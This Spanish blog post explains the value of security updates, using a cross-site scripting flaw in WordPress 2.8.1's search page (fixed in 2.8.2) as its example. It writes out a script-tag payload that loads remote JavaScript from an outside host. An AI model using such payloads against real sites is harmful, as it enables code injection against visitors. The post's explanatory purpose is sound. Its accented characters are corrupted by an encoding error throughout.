Mecus

Cuando actualizar es importante

Ahora los jueves me toca escribir en Mecus 馃檪

Mi art铆culo de ayer (como siempre, comentarios en el sitio original):

Cuando actualizar es importante

Mucho se habla y se escucha en internet acerca de los peligros de la inyecci贸n de c贸digo. Sin ir m谩s lejos, si est谩s leyendo esto, probablemente habr谩s o铆do hablar alguna vez de ella.

Muchos te gritan 隆Actualiza a la 煤ltima versi贸n! 隆Hay problemas de seguridad!

驴Tenemos razones para alarmarnos?

0wn3dbig

De un tiempo a esta parte, los problemas que existen, si bien no son graves, s铆 que son potencialmente peligrosos. Eso significa que, en determinadas manos, pueden ser utilizados de formas que nosotros no esperar铆amos. S贸lo tenemos que ver lo que algunos afirman que pueden hacer con zumo de naranja concentrado y gasolina, o lo que es capaz de hacer MacGyver con un clip.

En nuestro caso, un problema de seguridad no supone un problema en s铆 mismo, en el sentido de que nada de lo que hay en nuestro sistema dejar谩 de funcionar o funcionar谩 de forma incorrecta. Pero s铆 deja una puerta abierta en el sistema para que otros puedan aprovecharla. Es lo que se conoce como posibilidad de ejecuci贸n remota de c贸digo malicioso. Como dec铆amos, la posibilidad de que alguien ejecute c贸digo en tu p谩gina tambi茅n es remota, pero si descubren que tienes esa vulnerabilidad, o est谩n intentando ejecutar algo, no suelen ir con buenas intenciones. Por lo que, lo mejor, es intentar tener el sistema blindado y no permitir que alguien ejecute c贸digo desde tu sistema.

Pero escuchamos mucho y no siempre hemos visto qu茅 es eso de una ejecuci贸n remota de c贸digo malicioso. Sencillo. Imaginaos por ejemplo que tenemos un blog en WordPress 2.8.1. Si en su p谩gina de b煤squeda intentamos buscar la cadena ‘<script src=http://ha.ckers.org/weird/stallowned.js></script>‘, ocurrir谩 lo siguiente:

Sallown3d

Por supuesto, se podr铆an ejecutar cosas no tan inocuas (aunque su da帽o a la vista lo hace). La actualizaci贸n de seguridad de WordPress 2.8.2 elimina ese error, y no permite la inyecci贸n de c贸digo.

(Muchas gracias a Pedro Laguna por las orientaciones, el script y sus consultor铆as desinteresadas).